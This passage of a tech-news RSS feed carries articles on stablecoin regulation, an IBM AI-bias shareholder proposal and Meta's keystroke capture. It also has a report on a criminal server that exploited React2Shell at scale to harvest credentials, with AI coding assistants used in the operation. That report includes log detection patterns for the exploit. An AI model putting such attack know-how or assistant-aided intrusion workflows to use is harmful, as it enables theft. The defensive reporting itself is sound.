</div><p><a href="https://yro.slashdot.org/story/26/04/28/0421237/supreme-court-hears-case-on-how-to-label-risks-of-popular-weed-killer?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Israel's Regulatory Authority Approves Shekel-Pegged Stablecoin After Pilot on Solana Blockchain]]></title>
<description><![CDATA[Israel’s regulator has approved a shekel-pegged stablecoin by Bits of Gold after a two-year pilot. The BILS token will operate under strict conditions, with reserves held in segregated local accounts, as authorities move towards regulated crypto adoption.]]></description>
<link>https://tsecurity.de/de/3471282/it-nachrichten/israels-regulatory-authority-approves-shekel-pegged-stablecoin-after-pilot-on-solana-blockchain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3471282/it-nachrichten/israels-regulatory-authority-approves-shekel-pegged-stablecoin-after-pilot-on-solana-blockchain/</guid>
<pubDate>Tue, 28 Apr 2026 15:01:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Israel’s regulator has approved a shekel-pegged stablecoin by Bits of Gold after a two-year pilot. The BILS token will operate under strict conditions, with reserves held in segregated local accounts, as authorities move towards regulated crypto adoption.]]></content:encoded>
</item>
<item>
<title><![CDATA[Banking Circle Launches Stablecoin Settlement Services After Bagging CASP Licence]]></title>
<description><![CDATA[Banking Circle has launched stablecoin settlement services after securing a CASP licence in Luxembourg. The offering enables fiat-to-stablecoin conversions for institutional clients, reflecting growing adoption of blockchain-based payment infrastructure within regulated financial systems.]]></description>
<link>https://tsecurity.de/de/3468417/it-nachrichten/banking-circle-launches-stablecoin-settlement-services-after-bagging-casp-licence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468417/it-nachrichten/banking-circle-launches-stablecoin-settlement-services-after-bagging-casp-licence/</guid>
<pubDate>Mon, 27 Apr 2026 16:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Banking Circle has launched stablecoin settlement services after securing a CASP licence in Luxembourg. The offering enables fiat-to-stablecoin conversions for institutional clients, reflecting growing adoption of blockchain-based payment infrastructure within regulated financial systems.]]></content:encoded>
</item>
<item>
<title><![CDATA[Morgan Stanley Announces MSILF Stablecoin Reserves Portfolio for Issuers]]></title>
<description><![CDATA[Morgan Stanley has introduced a Stablecoin Reserves Portfolio, enabling issuers to invest reserves in money market funds. The move aligns with evolving US regulations under the GENIUS Act and reflects growing institutional interest in integrating stablecoins into traditional financial systems.]]></description>
<link>https://tsecurity.de/de/3461601/it-nachrichten/morgan-stanley-announces-msilf-stablecoin-reserves-portfolio-for-issuers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461601/it-nachrichten/morgan-stanley-announces-msilf-stablecoin-reserves-portfolio-for-issuers/</guid>
<pubDate>Fri, 24 Apr 2026 15:18:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Morgan Stanley has introduced a Stablecoin Reserves Portfolio, enabling issuers to invest reserves in money market funds. The move aligns with evolving US regulations under the GENIUS Act and reflects growing institutional interest in integrating stablecoins into traditional financial systems.]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM shareholder proposal demands IBM defend AI bias protocols]]></title>
<description><![CDATA[CIOs have long struggled with AI reliability issues, given problems with training data, model interpretations, and inconsistent data weighting delivering various levels of bias. IBM officials at next week’s shareholder meeting will have to address those concerns directly, as they face a sharehold...]]></description>
<link>https://tsecurity.de/de/3459855/it-nachrichten/ibm-shareholder-proposal-demands-ibm-defend-ai-bias-protocols/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3459855/it-nachrichten/ibm-shareholder-proposal-demands-ibm-defend-ai-bias-protocols/</guid>
<pubDate>Fri, 24 Apr 2026 04:01:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>CIOs have long struggled with AI reliability issues, given problems with training data, model interpretations, and inconsistent data weighting delivering various levels of bias. IBM officials at next week’s shareholder meeting will have to address those concerns directly, as they face a shareholder motion demanding increased visibility into how it manages AI bias, a thorny issue that also affects all of the other major AI players. </p>



<p>The shareholder resolution is demanding that IBM “issue a report, within the next year, on the methods used to eliminate bias from the Company’s artificial intelligence (AI) models, Including an assessment of the risk that seeking to avoid disparate impact in outputs will undermine the accuracy of, and trust in, those outputs.”</p>



<p>IBM’s <a href="https://www.ibm.com/downloads/documents/us-en/15db52361b420c14" target="_blank" rel="nofollow">official response to the resolution</a> asks shareholders to reject the proposal. “Since releasing its first Granite model, IBM has been transparent with its data management and training procedures via technical reports, model cards, and other model documentation,” the company said. “The IBM models are open source In order to foster transparency. Moreover, IBM publicly provides the information sought by this proposal in its submissions to Stanford University’s Foundation Model Transparency Index (FMTI).”</p>



<p><a href="https://crfm.stanford.edu/fmti/December-2025/index.html" target="_blank" rel="nofollow">FMTI</a> is a benchmarking initiative that looks at how transparent companies are about their foundation models, measuring disclosure across areas like data sources, training methods, evaluation metrics, risks, and governance practices, to help stakeholders understand how responsibly and openly these models are developed and deployed.</p>



<p>IBM’s response added, “information related to mitigating bias that the proponent requests is largely already publicly available for consideration by stockholders.” Therefore, it argued, preparing such a report “would not provide new meaningful information and it is not in the best interests of IBM stockholders, as it will divert management’s attention and would be an inefficient use of corporate resources.”</p>



<p>Beyond its argument that it already provides such AI bias transparency, the company pointed to its customers’ ability to fine-tune their models to resolve any specific bias concerns. </p>



<p>“IBM models are smaller and targeted towards enterprise clients and use cases,” it said. “These models are not general purpose, consumer-facing models. Therefore, our open-source models are built in a manner that allows our clients to build an AI solution that will address their specific needs. IBM developed several methods to allow clients to address bias issues that may arise as they train the AI system. In other words, IBM not only provides the building blocks for its clients’ AI solutions, but also provides the tools to help more clients address bias.”</p>



<h2 class="wp-block-heading">An industry-wide problem</h2>



<p>Analysts and consultants generally found IBM’s position correct, but most pointed to the AI bias issue as an industry-wide problem impacting all of the major AI providers and all of their enterprise users. </p>



<p><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="nofollow">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said, “IBM’s stance deserves to be taken seriously, but not at face value. The company is right to say that bias mitigation, fairness frameworks, and governance controls are already built into its AI systems. That is not in dispute. In fact, compared to much of the market, IBM has been more deliberate than most in turning responsible AI from a set of principles into something operational.”</p>



<p>But, he added, “when IBM points out that customers can and should address bias through fine-tuning and governance, it is quietly acknowledging a limitation. It is admitting that whatever happens at the model layer is not the end of the story. It is only the beginning of it.”</p>



<p><a href="https://www.infotech.com/profiles/manish-jain" target="_blank" rel="nofollow">Manish Jain</a>, a principal research director at Info-Tech Research Group, saw the IBM position as correct, but also as the latest example of large vendors shifting responsibility for AI accuracy onto their enterprise customers. </p>



<p>“I see IBM’s board’s stance being broadly consistent with industry practice, which is doing everything to shift the responsibility of removing bias towards customers,” Jain said. “In fact, many independent software vendors (ISVs) are also taking a similar position and saying to their customers, ‘We’ll provide the compass, you chart the course.’ Unfortunately, accountability is the victim. Regulatory guidelines, independent audits, standardized benchmarks, in addition to clearer disclosures, are extremely important to ascertain this accountability.”</p>



<p><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="nofollow">Noah Kenney</a>, principal consultant for Digital 520, had similar feelings about IBM’s response. </p>



<p>The shareholder demand for more transparency “is asking the right question for the wrong reason,” Kenney said. “The proponent frames disparate-impact correction as a threat to accuracy, but the real issue is that IBM, and every major model provider, is measuring bias at the output layer when most of it originates upstream. You cannot fairness-tune your way out of a training data problem.”</p>



<p>He noted, “IBM’s response is accurate on the facts. FMTI scores, model cards, FairIQ, Equi-tuning, FairReprogram, and the Granite transparency posture are all real, and more than most of their peers publish. The gap is not disclosure. The gap is that the industry has converged on post-hoc mitigation as the dominant paradigm, and post-hoc mitigation has diminishing returns once a model is trained.”</p>



<p><a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="nofollow">Mike Leone</a>, VP/principal analyst at Moor Insights &amp; Strategy, pointed out that IBM is doing a better job than most AI vendors in terms of bias transparency, and that the industry needs to address the issue globally. </p>



<p>“IBM discloses more of its AI bias and transparency work than most vendors. IBM has built specific bias mitigation methods into the stack rather than just talking about bias at a high level. A new annual report would mostly repeat what’s already out there,” Leone said. </p>



<p>“I truly don’t think eliminating bias is possible, and that’s not an IBM problem,” he added. “The whole market is operating the same way in that any model trained on human-generated data carries the biases of whoever made it, which is exactly the same as humans would do. What vendors can do, IBM included, as they do a bunch of this already, is measure it, disclose it, monitor it after deployment, and give customers tools to adapt. I’m in the camp that anyone promising to completely eliminate bias is telling you what you want to hear.”</p>



<h2 class="wp-block-heading">‘Unbiased’ can’t be defined</h2>



<p>Part of the answer to the AI bias problem is technological, but there is an underlying fundamental issue of bias that cannot possibly be defined. </p>



<p><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="nofollow">Carmi Levy</a>, an independent technology analyst, observed, “the very definition of the word, unbiased, simply doesn’t exist, because what might seem unbiased or perfectly fair to one stakeholder might be perceived as wildly biased or unfair by another.”</p>



<p>Within that context, he noted, “the notion of eliminating any and all forms of bias from the AI equation is unrealistic. At best, vendors should be aiming for mitigation instead of outright elimination. They might also want to devote more resources toward transparency. Although sharing too much can compromise their competitive market position, there’s no reason why a carefully balanced and communicated messaging strategy can’t alleviate stakeholder concerns over bias without giving competitors undue advantage.”</p>



<h2 class="wp-block-heading">Complete bias removal impossible</h2>



<p>The AI bias issue is sometimes subtle, as it chooses which of the relevant details it should use in answers and in what sequence. But in other instances, such as when <a href="https://www.cio.com/article/4160432/ai-is-scoring-your-job-candidates-can-you-explain-how.html" target="_blank">racial and gender prejudices are reinforced</a> by <a href="https://www.cio.com/article/4158892/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity.html" target="_blank">AI working for human resources</a>, the bias can potentially appear quite blatant. <a href="https://www.computerworld.com/article/4152400/california-to-bar-ai-vendors-that-cant-prove-bias-safeguards.html" target="_blank">California, for example, wants to force AI vendors</a> to prove that they have strong bias safeguards. </p>



<p>However, said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="nofollow">Nader Henein</a>, “completely removing bias is impossible, which is why almost every piece of AI regulation focuses on AI systems that make decisions that will impact people’s lives or people’s livelihoods and introduce obligations such as human oversight.” </p>



<p>For example, he said, “a recruitment application that sorts applicants by the suitability to a job role should be used by a trained recruiter who understands that this is AI, that it can make mistakes, and they are responsible to oversee the AI system, much in the same way that you oversee an entry level employee taking on sensitive work, the difference being that oversight is permanent.”</p>



<p><a href="https://linkedin.com/in/chrishood" target="_blank" rel="nofollow">Chris Hood</a>, an independent AI strategist and former head of Google’s strategy and transformation, also said that IBM’s position is legitimate, but it’s not enough.</p>



<p>“IBM’s position is technically defensible and practically insufficient,” Hood said. “Publishing bias mitigation reports and giving customers fine-tuning options are reasonable steps. They are also steps that address the symptoms rather than the architecture. IBM is describing what it does to manage bias. The harder question is whether bias in foundation models is manageable at all, or whether it is structural.”</p>



<p>He noted that the models learned from human-generated content, which carries “every historical imbalance, cultural assumption, and factual error humans have ever produced at scale. You can audit it, weight it, and filter it. You cannot eliminate it. The data is what it is.”</p>



<p>Potentially more of an issue is the personal bias that every user brings to every AI interaction. “A geopolitically charged question asked by someone in the United States and the same question asked by someone in another country will be interpreted differently, evaluated differently, and potentially produce different outputs. This layer is almost impossible to govern at the model level because it lives in the interaction, not the training,” Hood noted.</p>



<p>He added: “IBM recommending shareholders reject this proposal while pointing to existing efforts is a reasonable governance posture. It is also a posture that treats bias as a solved problem rather than a managed one. The difference matters enormously as agents move from answering questions to making decisions.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exposed Server Reveals AI-Assisted Credential Harvesting Factory]]></title>
<description><![CDATA[An exposed server sitting open on the internet handed forensic investigators something rarely available; an unobstructed view inside a running criminal operation, complete with code, logs, victim data, Telegram alert streams, and transcripts showing an operator using Claude Code and OpenClaw as d...]]></description>
<link>https://tsecurity.de/de/3455870/it-security-nachrichten/exposed-server-reveals-ai-assisted-credential-harvesting-factory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3455870/it-security-nachrichten/exposed-server-reveals-ai-assisted-credential-harvesting-factory/</guid>
<pubDate>Wed, 22 Apr 2026 19:51:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="534" src="https://thecyberexpress.com/wp-content/uploads/Bissa-Scanner-Workflow-e1776879556196.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Bissa Scanner, Credential Harvesting, Claude, OpenClaw, React2Shell" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Bissa-Scanner-Workflow-e1776879556196.png 800w, https://thecyberexpress.com/wp-content/uploads/Bissa-Scanner-Workflow-e1776879556196.avif 800w" sizes="(max-width: 800px) 100vw, 800px" title="Exposed Server Reveals AI-Assisted Credential Harvesting Factory 1"></p><p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">An exposed server sitting open on the internet handed forensic investigators something rarely available; an unobstructed view inside a running criminal operation, complete with code, logs, victim data, Telegram alert streams, and transcripts showing an operator using Claude Code and OpenClaw as day-to-day workflow assistants to build, debug, and refine an automated credential harvesting machine.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The DFIR Report published its findings, after discovering the exposed host and documenting its contents in full. The platform — identified across multiple operator-controlled tools and bot handles as "Bissa scanner" — combined React2Shell exploitation at internet scale with an AI-assisted operational pipeline that automated target scanning, compromise scoring, credential extraction, victim triage, and Telegram-based alerting into a single cohesive workflow.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>The Vulnerability at the Center - React2Shell</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">CVE-2025-55182, widely tracked as React2Shell, is a CVSS 10.0 unauthenticated remote code execution <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="27920">vulnerability</a> in React Server Components affecting React versions 19.0 through 19.2.0 and the Next.js framework that implements them. First publicly disclosed on December 3, 2025, the flaw allows an attacker to execute arbitrary code on the server with a single crafted HTTP POST request, exploiting insecure deserialization in the RSC Flight protocol with no authentication required.</p>

<h5>Also read: <a href="https://thecyberexpress.com/react2shell-flaw-exploited-by-chinese-groups/" target="_blank" rel="noopener">‘React2Shell’ Flaw Exploited by China-Nexus Groups Within Hours of Disclosure, AWS Warns</a></h5>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">CISA added it to the Known Exploited <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="Vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="27919">Vulnerabilities</a> catalog shortly after disclosure. <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="27922">Security</a> vendors including Google GTIG, Microsoft, Wiz, and Cisco Talos all documented widespread exploitation activity across state-sponsored and financially motivated threat actors within days of the vulnerability going public.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The Bissa scanner operation represents a distinct, independently tracked campaign running on top of that vulnerability — one distinguished not by the <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="27918">exploit</a> it used, but by the operational sophistication of what it built around it.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>13,000 Files and a Running Operation</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The exposed server contained more than 13,000 files across 150-plus directories covering exploitation, victim-data staging, credential harvesting, access validation, and operator workflow management. The DFIR Report characterized this infrastructure not as a passive <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="27917">data</a> store but as active operational infrastructure — built to acquire access at scale and operationalize the highest-value results from that access.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Artifacts on the host showed that React2Shell was central to a workflow capable of scanning millions of internet-facing targets. Logs on the server indicated more than 900 confirmed successful compromises — a hit rate that reflects both the severity of the underlying vulnerability and the sophistication of the scanning pipeline built to exploit it at volume.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>AI Tools as Criminal Workflow Assistants</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The most operationally novel element documented in the <a href="https://thedfirreport.com/2026/04/22/bissa-scanner-exposed-ai-assisted-mass-exploitation-and-credential-harvesting/" target="_blank" rel="nofollow noopener">DFIR Report</a> is the direct integration of AI coding assistants into the attack workflow. Transcripts recovered from the server showed the operator using Claude Code — Anthropic's command-line AI coding tool — and OpenClaw to read the scanner codebase, troubleshoot pipeline failures, orchestrate workflows, and refine the collection pipeline over time.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Claude Code and OpenClaw were used as an operator-side harness supporting exploitation activity and workflow orchestration, the report states. This AI-assisted workflow is what enabled the Bissa scanner to function as a modular platform supporting a broader, structured process: exploiting targets, reviewing results, validating access, and prioritizing the most valuable victim environments.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>Every Tier of Modern SaaS Acted as Credential Harvesting Opportunity</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Secret harvesting was the operation's primary revenue mechanism. The tens of thousands of .env files — environment configuration files that web applications use to store API keys, database credentials, and service tokens — yielded credentials spanning every tier of modern cloud infrastructure.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">AI providers constituted the single largest credential category, with keys recovered for Anthropic, Google, OpenAI, Mistral, OpenRouter, Groq, Replicate, DeepSeek, and HuggingFace. Cloud provider credentials covered AWS, Azure, Google Cloud, Cloudflare, and DigitalOcean.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Payment platform keys included Stripe, PayPal, Shopify, and Square. Database credentials spanned Supabase and MongoDB. Identity and authentication secrets from Auth0, Okta, and Clerk were also present, alongside GitHub tokens, Slack integration keys, Twilio and SendGrid messaging credentials, Fireblocks crypto custody API keys, and Plaid banking integration tokens.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The scope of this credential inventory reflects a critical structural weakness in modern cloud-native applications. Developers routinely store production secrets in .env files that ship with deployed code, creating a single-file jackpot for any attacker who achieves code execution on a web server.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>The Operator Triaged What It Found</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The DFIR Report's most significant finding beyond the raw credential volume is that the Bissa scanner operation was not indiscriminate at the post-compromise layer. Artifacts show the operator triaged victim access, validated stolen data, and concentrated deeper collection and follow-on activity on organizations that met a clear value threshold — particularly those in the financial, cryptocurrency, and retail sectors.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Three victim clusters on the server illustrate this selectivity. One victim was a mid-sized tax resolution and financial advisory firm whose staged dataset included Plaid tokens, linked bank-account data, IRS transcript material, ACH-related records, Twilio call data, Salesforce contacts, and case files containing Social Security numbers and dates of birth.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">A second victim was a large digital-asset, payments, and enterprise finance company whose compromised data reflected authenticated Oracle Fusion REST export activity tied to supplier, invoice, purchase-order, and bank-account records.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">A third victim, a mid-sized payroll, HR, and stablecoin payments platform, had payroll, settlement, Fireblocks integration, and HR information system material staged on the same server. In the second and third cases, the initial access path could not be confirmed as originating from the React2Shell scanner.</p>

<h3 class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><strong>One Person, Two Bots, a Telegram Channel</strong></h3>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Runner scripts across the Bissa scanner harness hardcoded a Telegram bot token tied to @bissapwned_bot, with all exploit confirmation alerts routed to a private chat channel whose sole human participant carries the public Telegram identity @BonJoviGoesHard with display name "Dr. Tube."</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Each bot message delivered a one-line structured alert per confirmed CVE-2025-55182 hit, distilling the victim's identity, runtime context, privilege level, cloud posture, and recoverable secret surface into a single at-a-glance triage record — enabling the operator to process hundreds of exploitation <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-security-events/" title="events" data-wpil-keyword-link="linked" data-wpil-monitor-id="27921">events</a> directly from a mobile phone.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The operator appears to run at least two dedicated bots: @bissapwned_bot for scanner alerting and @bissa_scan_bot within the AI-control subsystem — consistent branding across a portfolio that also includes tools labeled bissascanner, bissa_bench, and bissapromax.</p>
<p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The DFIR Report and parallel research from Cisco Talos, Microsoft, and Google all converge on the same immediate priorities: patch CVE-2025-55182 across all Next.js and React Server Components deployments immediately; rotate all API keys, database credentials, and .env secrets as a precautionary measure regardless of confirmed exploitation; audit application logs for POST requests containing $@ patterns or #constructor strings; restrict access to cloud metadata service endpoints; and implement secrets scanning across CI/CD pipelines to eliminate .env files as a persistent attack surface.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hey Meta workers, are you getting paid for those keystrokes?]]></title>
<description><![CDATA[No longer content to subsume recognizable intellectual properties, the majority of the indexed internet and books (basically all of them), AI will apparently now begin devouring its own workforce.
A report in Reuters alleged that the keystrokes, mouse movements and clicks of Meta's workforce are ...]]></description>
<link>https://tsecurity.de/de/3455021/it-nachrichten/hey-meta-workers-are-you-getting-paid-for-those-keystrokes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3455021/it-nachrichten/hey-meta-workers-are-you-getting-paid-for-those-keystrokes/</guid>
<pubDate>Wed, 22 Apr 2026 15:32:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>No longer content to subsume <a data-i13n="cpos:1;pos:1" href="https://www.bbc.com/news/articles/cg5vjqdm1ypo">recognizable intellectual properties</a>, the majority of the i<a data-i13n="cpos:2;pos:1" href="https://commoncrawl.org/">ndexed internet</a> and books (<a data-i13n="cpos:3;pos:1" href="https://www.theatlantic.com/technology/archive/2025/03/libgen-meta-openai/682093/">basically all of them</a>), AI will apparently now begin devouring its own workforce.</p>
<p>A report in <em>Reuters</em> <a data-i13n="cpos:4;pos:1" href="https://www.reuters.com/sustainability/boards-policy-regulation/meta-start-capturing-employee-mouse-movements-keystrokes-ai-training-data-2026-04-21/">alleged</a> that the keystrokes, mouse movements and clicks of Meta's workforce are to be captured for the purposes of training AI — something the company's communications department was happy to confirmed as accurate! In a cheery missive, a company spokesperson told Engadget that "If we're building agents to help people complete everyday tasks using computers, our models need real examples of how people <em>actually</em> use them [...] we’re launching an internal tool that will capture these kinds of inputs on certain applications to help us train our models."</p>
<span></span><p>All this leads one to ask the obvious question: <em>hey, what the fuck?</em></p>
<p>The nature of at-will employment in the United States is such that your boss <a data-i13n="cpos:5;pos:1" href="https://www.ncsl.org/labor-and-employment/at-will-employment-overview">basically never needs to explain</a> why your job duties change, but it's rarely so sweeping, so brazen or so unavoidably tied to the reminder that you are being surveilled at a frighteningly granular level. Gross!</p>
<p>Installing keyloggers on someone else's computer in a non-work setting can often constitute a <a data-i13n="cpos:6;pos:1" href="https://www.justice.gov/criminal/file/442156/dl?inline=">criminal offense</a> (hello <a data-i13n="cpos:7;pos:1" href="https://www.justice.gov/jm/jm-9-48000-computer-fraud">CFAA</a>!) and it's frankly weird we allow this sort of thing to happen in the workplace at all. But in this case, there's at least some possibility this data may eventually be used to <a data-i13n="cpos:8;pos:1" href="https://medium.com/codetodeploy/i-trained-the-ai-that-replaced-me-56febbba942a">replace</a> the exact people currently strongarmed into making those clicks and clacking those keys — or as <a data-i13n="cpos:9;pos:1" href="https://www.forbes.com/sites/maryroeloffs/2026/04/15/snap-blames-1000-layoffs-on-ai-and-these-companies-have-done-the-same/">a thin excuse to lay a lot of them off</a>.</p>
<p>It's not as though the data underpinning large language models is worthless. Ill-gotten information has been the subject of exorbitant <a data-i13n="elm:affiliate_link;sellerN:The New York Times;elmt:;cpos:10;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=c813ae39-7d58-41cb-ac66-ad830606ceef&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=e039f8df-ab77-4360-a11b-8d4533a8af3f&amp;featureId=text-link&amp;merchantName=The+New+York+Times&amp;linkText=settlements&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5ueXRpbWVzLmNvbS8yMDI1LzA5LzA1L3RlY2hub2xvZ3kvYW50aHJvcGljLXNldHRsZW1lbnQtY29weXJpZ2h0LWFpLmh0bWwiLCJjb250ZW50VXVpZCI6ImUwMzlmOGRmLWFiNzctNDM2MC1hMTFiLThkNDUzM2E4YWYzZiIsIm9yaWdpbmFsVXJsIjoiaHR0cHM6Ly93d3cubnl0aW1lcy5jb20vMjAyNS8wOS8wNS90ZWNobm9sb2d5L2FudGhyb3BpYy1zZXR0bGVtZW50LWNvcHlyaWdodC1haS5odG1sIn0&amp;signature=AQAAAYsG9A1xWsw_Y1Aa2EcmB8omo48uCumG7hOdVmOr3Sol&amp;gcReferrer=https%3A%2F%2Fwww.nytimes.com%2F2025%2F09%2F05%2Ftechnology%2Fanthropic-settlement-copyright-ai.html" class="rapid-with-clickid" data-original-link="https://www.nytimes.com/2025/09/05/technology/anthropic-settlement-copyright-ai.html">settlements</a> and many <a data-i13n="cpos:11;pos:1" href="https://www.engadget.com/ai/warner-bros-discovery-is-suing-midjourney-for-copyright-infringement-035850831.html">pending</a> <a data-i13n="cpos:12;pos:1" href="https://www.engadget.com/ai/three-youtubers-accuse-apple-of-illegal-scraping-to-train-its-ai-models-181028745.html">court</a> <a data-i13n="cpos:13;pos:1" href="https://www.engadget.com/ai/encyclopedia-britannica-sues-openai-for-copyright-and-trademark-infringement-164747991.html">cases</a> with considerable sums riding on their eventual judgements. If Meta thought it could obtain this sort of data from its estimated <a data-i13n="cpos:14;pos:1" href="https://marketing4ecommerce.net/en/daily-active-users-meta/">3.5 billion</a> combined users instead of its <a data-i13n="cpos:15;pos:1" href="https://www.macrotrends.net/stocks/charts/META/meta-platforms/number-of-employees#google_vignette">comparably paltry body of employees</a> without it immediately reading as the single most invasive chapter<em> </em>in a laughably long history of <em>move fast, break things, and never admit to the mess, </em>wouldn't it just... do that? Technology has progressed so far, yet people continue to really hate feeling taken advantage of. And that sort of thing is <a data-i13n="elm:affiliate_link;sellerN:CNBC;elmt:;cpos:16;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=34e37b9c-8975-48da-aa39-df8bcd5badc3&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=e039f8df-ab77-4360-a11b-8d4533a8af3f&amp;featureId=text-link&amp;merchantName=CNBC&amp;linkText=still+bad+for+business&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5jbmJjLmNvbS8yMDI2LzAxLzI2L3Rpa3Rvay11bmluc3RhbGxzLWFyZS11cC0xNTBwZXJjZW50LWZvbGxvd2luZy11cy1qb2ludC12ZW50dXJlLmh0bWwiLCJjb250ZW50VXVpZCI6ImUwMzlmOGRmLWFiNzctNDM2MC1hMTFiLThkNDUzM2E4YWYzZiIsIm9yaWdpbmFsVXJsIjoiaHR0cHM6Ly93d3cuY25iYy5jb20vMjAyNi8wMS8yNi90aWt0b2stdW5pbnN0YWxscy1hcmUtdXAtMTUwcGVyY2VudC1mb2xsb3dpbmctdXMtam9pbnQtdmVudHVyZS5odG1sIn0&amp;signature=AQAAAVhEe-nPk-3p1xwH_uy0tNHY0P8nCHCoIA2OirG9ep2k&amp;gcReferrer=https%3A%2F%2Fwww.cnbc.com%2F2026%2F01%2F26%2Ftiktok-uninstalls-are-up-150percent-following-us-joint-venture.html" class="rapid-with-clickid" data-original-link="https://www.cnbc.com/2026/01/26/tiktok-uninstalls-are-up-150percent-following-us-joint-venture.html">still bad for business</a>.</p>
